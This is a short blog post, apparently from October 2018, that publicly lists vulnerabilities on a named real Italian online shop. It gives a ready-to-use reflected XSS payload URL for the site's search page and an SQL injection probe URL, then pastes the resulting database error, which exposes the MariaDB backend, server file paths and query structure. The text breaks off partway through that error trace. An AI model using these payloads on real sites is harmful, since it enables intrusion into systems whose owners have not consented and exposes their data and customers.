Posts

Showing posts from October, 2018

gmashop.it | xss

XSS
https://www.gmashop.it/Ricerca.cfm?testo="><img onError="alert(1)" src="a" /><"
archived: http://archive.is/P0OXI

SQL Injection sample raising an error
https://www.gmashop.it/Inside.cfm?sezione=PRODOTTI&area=PRODOTTI&mod=elenco&apmenu=partner&codpar=2'00
archived: http://archive.is/ufpwM

Error Executing Database Query.
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''00 AND LINGUA = 'IT'' at line 3
The error occurred in /var/www/html/gmashop/Query/Prodotti/SelNomePar.cfm: line 5
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 89
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 84
Called from /var/www/html/gmashop/Prodotti/Prodotti_elenco.cfm: line 1
Called from /var/www/html/gmashop/Inside.cfm: line 48
Called from /var/www/html/gmashop/Query/Prodotti/SelNo